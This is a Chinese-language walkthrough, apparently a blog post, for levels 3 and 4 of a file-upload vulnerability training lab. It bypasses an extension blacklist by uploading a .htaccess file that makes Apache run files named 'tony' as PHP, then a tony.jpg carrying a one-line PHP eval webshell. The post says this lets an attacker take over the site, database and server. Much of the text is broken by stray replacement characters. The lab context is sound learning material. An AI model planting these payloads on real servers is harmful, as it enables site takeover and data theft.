闖關(guān)環(huán)境介紹:第三關(guān)的本意其實(shí)是想上傳一些后綴名為php����、php2���、php3��、php5、phtml等文件去繞過(guò)黑名單的,但是apache的配置文件里并沒(méi)有配置將這些后綴的文件當(dāng)做php解析 第三關(guān)第四關(guān)都是黑名單檢測(cè)�����,但是在這里黑名單里都沒(méi)有對(duì).htacess做限制�,所以這兩關(guān)都可以上傳.htaccess去繞過(guò),.htaccess文件的內(nèi)容如下 <FilesMatch "tony"> SetHandler application/x-httpd-php </FilesMatch>
第一步:上傳.htaccess我們將這樣一個(gè).htaccess文件上傳到服務(wù)器上傳目錄����,這樣的話,當(dāng)apache在解析該目錄下的php時(shí)���,就會(huì)按照.htaccess中的要求去解析�,只要匹配到了文件名里有tony這個(gè)字符串,就會(huì)把該文件當(dāng)成php文件解析首先上傳這樣的一個(gè).htaccess文件 .htaccess可以上傳成功 第二步:上傳含有上面.htaccess文件設(shè)置的關(guān)鍵字的文件名接著上傳一個(gè)黑名單里沒(méi)有過(guò)濾的隨意后綴名文件�,但是文件名里要有tony,上傳一個(gè)tony.jpg�����,內(nèi)容為一句話木馬 上傳成功��,并且tony.jpg會(huì)被apache當(dāng)成php文件解析 第四關(guān)也是同樣的方法 By the way��,許多對(duì)安全感興趣但沒(méi)有這方面經(jīng)驗(yàn)的小朋友�,看到這里總是感覺(jué)顯示一個(gè)phpinfo的頁(yè)面能代表什么,能夠執(zhí)行phpinfo(),這個(gè)函數(shù)證明��,上傳的文件可以執(zhí)行PHP腳本�,這個(gè)時(shí)候如果上傳的是一句話木馬<?php eval($_POST['A'])?>,就可以直接配合『菜刀』拿下整個(gè)站點(diǎn),查看源碼��,甚至修改數(shù)據(jù)庫(kù)或者控制操作系統(tǒng)�����。
網(wǎng)路滲透上傳漏洞19關(guān)系列-第一關(guān)前端繞過(guò)? 網(wǎng)絡(luò)滲透上傳漏洞闖19關(guān)-第二關(guān)MIME類型繞過(guò)
|
